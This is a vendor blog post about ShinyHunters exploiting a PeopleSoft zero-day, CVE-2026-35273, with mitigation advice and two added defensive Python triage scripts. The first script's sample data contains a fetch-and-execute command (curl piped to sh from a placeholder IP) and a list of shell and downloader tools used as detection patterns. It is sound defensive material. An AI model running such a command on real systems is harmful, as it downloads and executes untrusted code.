

A critical zero-day in Oracle PeopleSoft is being actively exploited by one of the most prolific data-theft groups operating today. If your organisation runs PeopleTools 8.61 or 8.62, whether you're a university, a government body, or a large enterprise, you need to act before Oracle's full patch arrives. BleepingComputer broke the news that Oracle has issued emergency mitigations for CVE-2026-35273, a flaw carrying a CVSS base score of 9.8, about as severe as vulnerabilities get. The group behind the exploitation, ShinyHunters, has already claimed to have hit roughly 300 PeopleSoft instances across 100 organisations. The victims are mostly universities, and the data taken is exactly the kind of personal and financial records that fuel extortion campaigns and dark web auctions.
CVE-2026-35273 is a remote code execution vulnerability in Oracle PeopleSoft Enterprise PeopleTools, specifically versions 8.61 and 8.62. What makes it particularly dangerous isn't just the severity score. It's the authentication requirement, or rather the complete absence of one. An attacker with network access to a vulnerable instance doesn't need valid credentials, a stolen session token, or any form of prior access. They send a crafted request, and the system executes arbitrary code. Full stop.
For any security manager who has spent time thinking about what attack surface really means for a business, this is the scenario that keeps you up at night. PeopleSoft deployments at universities and large organisations are frequently exposed to the public internet precisely because they need to be: student self-service portals, faculty access systems, and HR modules have to be reachable from outside the campus network. That design requirement, entirely legitimate in isolation, turns CVE-2026-35273 into a trivially accessible entry point for anyone who knows where to look.
Oracle PeopleSoft is an ERP platform that sits at the heart of how governments, universities, and corporations manage HR, payroll, finance, and in academic settings, student information. The data it holds (social security numbers, dates of birth, salary records, academic transcripts, banking details for payroll) is precisely what financially motivated threat actors target. It's not peripheral data. It's the core administrative record of an institution, and a successful breach of a PeopleSoft instance is effectively a breach of everything that institution knows about every employee, every student, and every financial transaction it has processed.
The timeline here should concern every security team running PeopleSoft. According to Rapid7, active exploitation of CVE-2026-35273 was observed from 27 May 2026 through to 9 June 2026, a two-week window that predated Oracle's advisory entirely. That means ShinyHunters was actively compromising PeopleSoft instances while Oracle had no public guidance, no patch, and no official acknowledgement that anything was wrong.
Two weeks is a long time. In that window, threat actors aren't just poking around looking for data. They're establishing persistence, exfiltrating records, and in ShinyHunters' case, almost certainly preparing victim lists for extortion contact. By the time Oracle's emergency mitigation appeared, a significant number of organisations had already been compromised without knowing it. If you were running a vulnerable instance during that period, the absence of an alert in your SIEM is not evidence that nothing happened; it may simply mean you weren't detecting the right things.
This kind of gap between exploitation in the wild and vendor response is not unusual, but it underlines why cyber threat intelligence that tracks threat actor behaviour and emerging exploitation patterns, rather than waiting for vendor advisories, is operationally necessary rather than a nice-to-have.
ShinyHunters is a financially motivated cybercriminal collective with a track record that spans several years and multiple sectors. They are not a nation-state actor, and not an APT operating under government direction. They are criminals motivated by money, and they are extremely good at identifying high-value targets, extracting large volumes of data quickly, and then monetising that data through a combination of dark web sales and direct extortion pressure on victims.
Their most prominent recent operation before this PeopleSoft campaign was the 2024 Snowflake credential-based attack wave. As SecurityWeek reported, that campaign impacted Ticketmaster, Santander Bank, and a range of other organisations whose data was stored in Snowflake cloud environments. The Snowflake incidents didn't rely on a vulnerability in Snowflake itself; they used stolen credentials to access customer tenants that lacked multi-factor authentication. The PeopleSoft campaign is different in mechanism but identical in intent: get in, get the data, monetise it.
What connects these two operations is ShinyHunters' consistent focus on platforms that aggregate large volumes of sensitive personal and financial records. Snowflake customers often use the platform to centralise data analytics across millions of records. PeopleSoft, similarly, centralises HR, payroll, and student information for entire institutions. The targets aren't chosen randomly. ShinyHunters looks for systems where a single successful compromise yields the highest possible volume of exploitable personal data.
Mandiant tracks this group under the designation UNC6240, which they equate with the publicly known ShinyHunters collective. The attribution was confirmed by Google's Mandiant following their analysis of the PeopleSoft exploitation campaign, as both Rapid7 and SecurityWeek reported. The UNC designation signals that Mandiant has sufficient evidence to cluster the activity but may still be building out the full picture of the group's infrastructure and membership.
The operational playbook UNC6240 follows is consistent across campaigns. First, mass scanning and exploitation of a known vulnerability or stolen credential set. Then rapid data exfiltration: they are not interested in dwell time for espionage purposes; they want the data out fast. After exfiltration comes the extortion phase, where victims are contacted directly before the data is listed for sale on dark web forums. Historically, ShinyHunters has sold stolen data sets on forums including BreachForums, often auctioning high-value data sets to the highest bidder when victims refuse to pay.
Understanding what stolen credentials and exfiltrated data look like when they surface on dark web forums is central to identifying whether your organisation was hit during the exploitation window. Monitoring those channels for mentions of your domain, your employees' records, or your institution's data is how security teams get advance warning before a formal breach notification arrives, or before it never arrives at all because the attacker chose to sell the data quietly rather than contact the victim. If you're not already watching those channels, the question is not whether this matters, but how much exposure you've already accumulated without knowing it.
The victim profile for this campaign is stark. According to The Hacker News, 68% of identified victims are universities and academic institutions. That concentration is not accidental. Higher education has a structural exposure problem with PeopleSoft that other sectors are less likely to share.
Universities run PeopleSoft for everything: student admissions records, financial aid processing, faculty HR and payroll, tuition billing, academic transcripts. The system is operationally central, and it has to be accessible from outside the campus network for students checking their financial aid status, for faculty accessing payroll, for applicants tracking admissions. That internet-facing requirement, combined with IT resource constraints that many universities face relative to the size and complexity of their estates, creates conditions where unpatched vulnerabilities persist longer than they would in a well-resourced enterprise security team.
The data profile of a university PeopleSoft instance is also exceptionally valuable from an attacker's perspective. A single university might have records covering tens of thousands of current students, alumni, and staff members. Those records include dates of birth, national identity numbers, home addresses, emergency contacts, bank account details for payroll direct deposits, academic performance records, and disciplinary histories. For an extortion group, that's leverage over both the institution and potentially over individuals whose records have been exfiltrated. The combination of scale and sensitivity makes universities an almost ideal target for financially motivated actors running this kind of campaign.
ShinyHunters' own claims put the scope of this campaign at approximately 300 PeopleSoft instances belonging to around 100 organisations, as reported by The Hacker News. Take those figures with appropriate scepticism: threat actors routinely overstate the scope of their campaigns to increase extortion pressure and inflate the apparent value of the data they're selling. But even if the real numbers are materially lower, the scale is significant.
One hundred organisations across a two-week exploitation window, before any public advisory existed, means that a substantial proportion of those victims had no opportunity to patch, no external warning, and no vendor guidance to act on. Some will have detected the intrusion through internal monitoring. Many will not have. And because ShinyHunters' playbook involves direct extortion contact before public disclosure, some organisations may already be managing a private negotiation or breach response without any public indication that they've been affected.
For security managers in EMEA who run PeopleSoft, the relevant question right now isn't whether your organisation was on the original target list. It's whether your instance was internet-accessible during the exploitation window, whether you've reviewed your logs from 27 May onwards, and whether you've seen any anomalous outbound data transfer or unusual process execution on your PeopleSoft application servers. The absence of a notification from ShinyHunters or from Oracle is not confirmation that you're clean.
Oracle has released emergency mitigations for CVE-2026-35273, with a full patch described as forthcoming. That distinction matters. An emergency mitigation is not the same as a patch. It typically involves configuration changes, workarounds, or temporary controls that reduce the immediate attack surface without fully resolving the underlying vulnerability. It buys time. It does not close the door.
The two-week gap between the start of active exploitation on 27 May and Oracle's advisory is partly an artefact of how zero-day discovery and vendor response works in practice. Vendors need time to triage reports, confirm the vulnerability, develop and test a fix, and prepare communications. That process takes time even under emergency conditions. But from an operator's perspective, the outcome is the same: your system was potentially exposed and being actively targeted while you had no vendor-provided defence to deploy.
Emergency mitigations should be applied immediately if you haven't done so already. But they need to be treated as a temporary measure, not a resolution. Oracle's full patch, when it arrives, should be treated as a P1 deployment task with no discretionary delay. Given that ShinyHunters is already sitting on exfiltrated data from this campaign, the risk doesn't disappear when the technical vulnerability is closed, but closing it does significantly reduce the chance of additional exploitation of your specific instance.
It's also worth being clear about what Oracle's response does and doesn't cover. The mitigation addresses the vulnerability. It does nothing for organisations that were already compromised during the exploitation window. If your instance was accessible and unpatched between 27 May and 9 June, applying the mitigation now stops further exploitation of CVE-2026-35273 but doesn't remove any backdoors or persistence mechanisms that may already have been established. Post-compromise investigation is a separate and necessary step.
Apply Oracle's emergency mitigation immediately. That's the baseline; if you haven't done this, it supersedes everything else in this section. Oracle's official advisory contains the specific configuration guidance; follow it exactly and document what you've changed.
Simultaneously, review your PeopleSoft application server logs for the period from 27 May 2026 onwards. You're looking for evidence of unexpected process spawning from the PeopleSoft application tier, anomalous outbound network connections, unusual volumes of data being accessed or transferred, and any authentication events that don't match known user patterns. Log retention policies vary significantly across organisations, and if you don't have 30 days of application-level logs, that's a gap to address as a structural matter once you've dealt with the immediate incident response requirements.
If you find evidence of compromise, or if you simply cannot rule it out because your logging wasn't sufficient, treat this as an active incident. Engage your incident response team or an external IR partner. Don't patch and move on. A PeopleSoft compromise that established persistence before Oracle's mitigation was available may still have active backdoors, scheduled tasks, or exfiltration mechanisms in place that are unrelated to the original CVE-2026-35273 exploit chain.
Network segmentation is a control that can significantly reduce the blast radius of any future exploitation of your PeopleSoft environment. If your PeopleSoft application servers currently have broad outbound internet access, that's a configuration that deserves review. The exfiltration phase of ShinyHunters' campaigns requires outbound connectivity to attacker-controlled infrastructure; restricting what your application servers can reach externally makes that phase harder. It doesn't prevent exploitation of a vulnerability, but it can prevent or delay the data theft that follows.
For institutions running internet-facing PeopleSoft student portals, consider whether any temporary access restrictions are operationally feasible during the period before Oracle's full patch is available. Even a temporary reduction in public exposure reduces the chance of opportunistic exploitation by actors other than ShinyHunters who may now be aware of this vulnerability.
Finally, search dark web forums and data marketplaces for mentions of your institution's name, domain, or data. Understanding what indicators of compromise look like when they surface in criminal environments is as important as reviewing your internal logs. ShinyHunters has a well-established pattern of listing stolen data on forums before or during extortion contact. If your data is already on the market, knowing that earlier rather than later changes your response options significantly.
At the time of writing, Oracle and Mandiant have not released a comprehensive public IoC set for CVE-2026-35273 exploitation. What is known from the Rapid7 analysis is that exploitation was active between 27 May and 9 June 2026, and that the campaign was attributed to UNC6240. Security teams should monitor their own threat intelligence feeds and vendor channels for updated IoC releases as the investigation matures.
Behavioural indicators to prioritise in your environment include unexpected child processes spawned by PeopleSoft application server processes, outbound connections from application servers to external IP ranges with no business justification, large or unusual queries against student records, HR, or payroll tables that don't correspond to known batch jobs or user activity, and any new scheduled tasks or cron jobs on PeopleSoft application or database servers created after 27 May 2026.
Endpoint detection tools deployed on PeopleSoft application servers should be checked to confirm they are running and that their detections during the exploitation window have been reviewed. A gap in EDR telemetry during that period warrants investigation; ShinyHunters has historically used techniques that attempt to evade or disable endpoint monitoring as part of post-exploitation activity.
Network-level indicators include unexpected DNS lookups to external domains from PeopleSoft application servers and anomalous data volumes on egress links connected to application server network segments. Baseline your normal outbound traffic from PeopleSoft infrastructure if you haven't already; you can't identify anomalous behaviour without a reference point for what normal looks like.
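To make the behavioural indicators above concrete, here is an added example of a first-pass triage over PeopleSoft application-server telemetry. It is not code from the original article, from Oracle, Rapid7 or Mandiant, and it carries no IoCs for CVE-2026-35273; the process names, the egress allowlist and the sample events are assumptions and constructed data that you would replace with your own EDR and firewall exports.

```python
"""Triage of PeopleSoft application-server telemetry against the behavioural
indicators discussed in the article. Added example, not code from the article,
Oracle, Rapid7 or Mandiant. Process names, allowlist and sample events are
assumptions / constructed data."""
from __future__ import annotations

import ipaddress
from datetime import datetime, timezone

# Start of the exploitation window reported by Rapid7 (27 May 2026; UTC assumed).
WINDOW_START = datetime(2026, 5, 27, tzinfo=timezone.utc)

# Assumption: parent processes you expect on a PeopleSoft app/web tier
# (PSAPPSRV/PSAESRV are app-server processes; java is the WebLogic PIA web tier).
PEOPLESOFT_PARENTS = {"PSAPPSRV", "PSMONITORSRV", "PSAESRV", "java"}

# Children a PeopleSoft server process has no business spawning.
SUSPICIOUS_CHILDREN = {"sh", "bash", "dash", "cmd.exe", "powershell.exe",
                       "curl", "wget", "nc", "python", "python3", "perl"}

# Assumption: sanctioned external destinations (SSO, SMTP relay, Oracle services).
# 203.0.113.0/24 is a documentation range standing in for a real partner network.
EGRESS_ALLOWLIST = [ipaddress.ip_network("203.0.113.0/24")]
RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def parse_ts(s: str) -> datetime:
    return datetime.fromisoformat(s.replace("Z", "+00:00"))


def suspicious_child_process(ev: dict) -> bool:
    """A PeopleSoft server process spawning a shell, downloader or interpreter."""
    return ev["parent"] in PEOPLESOFT_PARENTS and ev["child"] in SUSPICIOUS_CHILDREN


def unexpected_egress(ev: dict) -> bool:
    """Outbound connection to a destination that is neither internal nor allowlisted."""
    dst = ipaddress.ip_address(ev["dst_ip"])
    if any(dst in net for net in RFC1918):
        return False
    return not any(dst in net for net in EGRESS_ALLOWLIST)


def new_persistence(ev: dict) -> bool:
    """Scheduled task / cron entry created on or after the start of the window."""
    return parse_ts(ev["ts"]) >= WINDOW_START


def hunt(events: list[dict]) -> list[dict]:
    """Return every event from the window onwards that matches one of the three indicators."""
    findings = []
    for ev in events:
        if parse_ts(ev["ts"]) < WINDOW_START:
            continue
        if ev["type"] == "process" and suspicious_child_process(ev):
            findings.append({"indicator": "suspicious_child", **ev})
        elif ev["type"] == "netconn" and ev.get("direction") == "out" and unexpected_egress(ev):
            findings.append({"indicator": "unexpected_egress", **ev})
        elif ev["type"] == "cron" and new_persistence(ev):
            findings.append({"indicator": "new_persistence", **ev})
    return findings


# Constructed sample telemetry (not real logs). 198.51.100.7 is a documentation address.
SAMPLE_EVENTS = [
    {"ts": "2026-05-20T09:00:00Z", "type": "process", "host": "psapp01",
     "parent": "PSAPPSRV", "child": "sh", "cmdline": "sh -c id"},              # before window: ignored
    {"ts": "2026-05-28T02:14:07Z", "type": "process", "host": "psapp01",
     "parent": "java", "child": "bash", "cmdline": "bash -c 'curl http://198.51.100.7/x | sh'"},
    {"ts": "2026-05-28T02:14:09Z", "type": "netconn", "host": "psapp01", "direction": "out",
     "process": "curl", "dst_ip": "198.51.100.7", "dst_port": 80},
    {"ts": "2026-05-28T02:20:00Z", "type": "netconn", "host": "psapp01", "direction": "out",
     "process": "PSAPPSRV", "dst_ip": "10.20.30.40", "dst_port": 1521},       # database: normal
    {"ts": "2026-05-28T02:21:00Z", "type": "netconn", "host": "psapp01", "direction": "out",
     "process": "java", "dst_ip": "203.0.113.9", "dst_port": 443},            # allowlisted
    {"ts": "2026-05-29T03:00:00Z", "type": "cron", "host": "psapp01",
     "user": "psadm2", "entry": "*/10 * * * * /tmp/.u/update.sh"},
    {"ts": "2026-05-28T02:30:00Z", "type": "process", "host": "psapp01",
     "parent": "PSAPPSRV", "child": "PSAPPSRV", "cmdline": "PSAPPSRV -C dom1"},  # normal respawn
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        detail = f.get("cmdline") or f.get("dst_ip") or f.get("entry")
        print(f"{f['ts']} {f['host']} {f['indicator']}: {detail}")
```

The value is in the three questions asked of every event after 27 May, not the toy data: normalise your own process, connection and scheduled-task telemetry into the same shape and run it over the whole window. Anything it flags is a lead for the incident response step above, not a confirmed compromise, and an empty result from a telemetry source that was not running is no result at all.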
Oracle PeopleSoft is one of the most widely deployed ERP platforms in the higher education sector because it was built to handle the specific administrative complexity of universities: managing student admissions, financial aid, tuition billing, academic records, and faculty HR all within a single integrated system. Many universities have run PeopleSoft for decades, building significant institutional processes around it, which makes migration to alternative platforms costly and disruptive. The platform also has extensive self-service functionality that universities need for students and staff to access their own records remotely, which is why PeopleSoft instances in this sector are frequently internet-accessible.
A PeopleSoft deployment at a university or large organisation typically contains some of the most sensitive personal and financial data an institution holds. This includes national identity numbers or social security numbers, dates of birth, home addresses, bank account details used for payroll direct deposits, salary records, academic transcripts, disciplinary records, emergency contact information, and financial aid data. For a financially motivated group like ShinyHunters, this combination is valuable both for direct extortion of the institution and for resale of individual records on dark web markets, where identity data of this type commands significant prices.
The emergency mitigation Oracle has released addresses the immediate exploitation vector for CVE-2026-35273 and should be applied without delay. However, it is a temporary control, not a full resolution of the underlying vulnerability. Oracle has indicated a complete patch is forthcoming, and that patch should be treated as a priority deployment the moment it becomes available. Additionally, for any organisation that was running an exposed, unpatched PeopleSoft instance between 27 May and 9 June 2026, applying the mitigation now addresses future exploitation risk but does not remediate a potential existing compromise. Post-exploitation investigation is required separately.
The most direct method is to attempt to access your PeopleSoft web server and its key endpoints from an external network (a mobile connection or a system outside your corporate perimeter) without using a VPN. If the login page or any application functionality is reachable, your instance has internet exposure. You can also use external attack surface discovery tools or services that scan for internet-facing services to check what your PeopleSoft deployment looks like from the perspective of an external attacker. Shodan and similar platforms index internet-facing PeopleSoft portals; if yours appears there, it was accessible during the exploitation window. Firewall and proxy logs showing inbound connections to your PeopleSoft application server ports from external IP ranges will also confirm exposure.
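The firewall-log check mentioned above, as an added example that is not from the original article or from Oracle: it filters allowed inbound connections to the PIA web tier during the Rapid7 window down to external sources and summarises who reached it first. The key=value log format, the firewall host, the PIA addresses and ports, and the source IPs are constructed; the external addresses use documentation ranges rather than real ones.

```python
"""Confirm internet exposure of a PeopleSoft PIA web tier from perimeter logs.
Added example, not code from the original article or from Oracle. The log
format, firewall host, PIA addresses, ports and source IPs are constructed."""
from __future__ import annotations

import ipaddress
import re
from collections import defaultdict
from datetime import datetime, timezone

# Rapid7's reported exploitation window: 27 May to 9 June 2026 (UTC assumed, end inclusive).
WINDOW_START = datetime(2026, 5, 27, tzinfo=timezone.utc)
WINDOW_END = datetime(2026, 6, 10, tzinfo=timezone.utc)

# Assumption: internal addresses and listening ports of the PIA (WebLogic) web servers.
PIA_HOSTS = {ipaddress.ip_address("10.20.1.15"), ipaddress.ip_address("10.20.1.16")}
PIA_PORTS = {443, 8443}

# Explicit RFC1918 check rather than ip.is_global: Python also treats the documentation
# ranges used in the sample (198.51.100.0/24, 203.0.113.0/24) as non-global.
RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

KV_RE = re.compile(r"(\w+)=(\S+)")


def parse_fw_line(line: str) -> dict:
    """Parse '<iso-ts> <fw-host> key=value ...' into a dict (constructed format)."""
    ts, fw, rest = line.split(" ", 2)
    rec = {"ts": datetime.fromisoformat(ts.replace("Z", "+00:00")), "fw": fw}
    rec.update(KV_RE.findall(rest))
    return rec


def is_rfc1918(ip_str: str) -> bool:
    ip = ipaddress.ip_address(ip_str)
    return any(ip in net for net in RFC1918)


def external_inbound_hits(lines: list[str]) -> list[dict]:
    """Allowed inbound connections from non-RFC1918 sources to a PIA host:port inside the window."""
    hits = []
    for line in lines:
        rec = parse_fw_line(line)
        if rec.get("action") != "allow":
            continue
        if not WINDOW_START <= rec["ts"] < WINDOW_END:
            continue
        if ipaddress.ip_address(rec["dst"]) not in PIA_HOSTS or int(rec["dpt"]) not in PIA_PORTS:
            continue
        if is_rfc1918(rec["src"]):
            continue
        hits.append(rec)
    return hits


def exposure_summary(hits: list[dict]) -> list[dict]:
    """One row per external source: connection count and first-seen time, earliest first."""
    by_src = defaultdict(list)
    for h in hits:
        by_src[h["src"]].append(h["ts"])
    rows = [{"src": s, "count": len(t), "first_seen": min(t)} for s, t in by_src.items()]
    return sorted(rows, key=lambda r: r["first_seen"])


# Constructed firewall records (not real logs).
SAMPLE_FW_LOG = [
    "2026-05-25T08:00:00Z fw01 action=allow proto=tcp src=198.51.100.23 spt=51522 dst=10.20.1.15 dpt=443",  # before window
    "2026-05-28T01:03:44Z fw01 action=allow proto=tcp src=198.51.100.23 spt=51530 dst=10.20.1.15 dpt=443",
    "2026-05-28T01:03:45Z fw01 action=allow proto=tcp src=198.51.100.23 spt=51531 dst=10.20.1.15 dpt=443",
    "2026-05-28T01:10:00Z fw01 action=allow proto=tcp src=192.168.50.7 spt=40000 dst=10.20.1.15 dpt=443",   # internal user
    "2026-05-30T22:15:09Z fw01 action=deny proto=tcp src=203.0.113.77 spt=60001 dst=10.20.1.15 dpt=8443",   # blocked
    "2026-06-02T14:20:00Z fw01 action=allow proto=tcp src=203.0.113.77 spt=60002 dst=10.20.1.16 dpt=8443",
    "2026-06-02T14:25:00Z fw01 action=allow proto=tcp src=203.0.113.77 spt=60003 dst=10.20.1.30 dpt=443",   # not a PIA host
    "2026-06-12T09:00:00Z fw01 action=allow proto=tcp src=198.51.100.23 spt=51600 dst=10.20.1.15 dpt=443",  # after window
]

if __name__ == "__main__":
    for row in exposure_summary(external_inbound_hits(SAMPLE_FW_LOG)):
        print(f"{row['src']:>16}  hits={row['count']}  first_seen={row['first_seen'].isoformat()}")
```

A non-empty result answers the exposure question for the window; it does not by itself indicate exploitation, since legitimate remote students and staff will appear in the same list. Feed the distinct external sources into the log review described earlier and look for the ones whose sessions coincide with process or egress anomalies on the application tier.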
UNC6240 is Mandiant's internal tracking designation for activity they have attributed to the group publicly known as ShinyHunters. Mandiant uses UNC designations ("uncategorised" clusters) when they have sufficient technical evidence to group activity together but may still be refining their understanding of the group's full infrastructure, membership, or operational scope. In this case, Mandiant has explicitly equated UNC6240 with ShinyHunters, as reported by both Rapid7 and SecurityWeek. The practical implication for defenders is that the TTPs, monetisation methods, and historical campaigns associated with ShinyHunters, including the 2024 Snowflake campaign, are all relevant context for understanding what this group is likely to do with data exfiltrated from PeopleSoft victims.
Attacks like this one rarely announce themselves through official channels first. New payloads, active infrastructure, and exploitation techniques circulate in closed forums and private channels well before any public research surfaces them. By the time an incident makes it into a threat report, organisations without early visibility are already behind.
Defendis gives your security team that early visibility. We monitor the dark web, underground forums, and threat actor channels so your team receives relevant intelligence before it becomes breaking news: context about emerging threats, matched against your organisation's exposure, without requiring your analysts to spend time in places they should not have to go.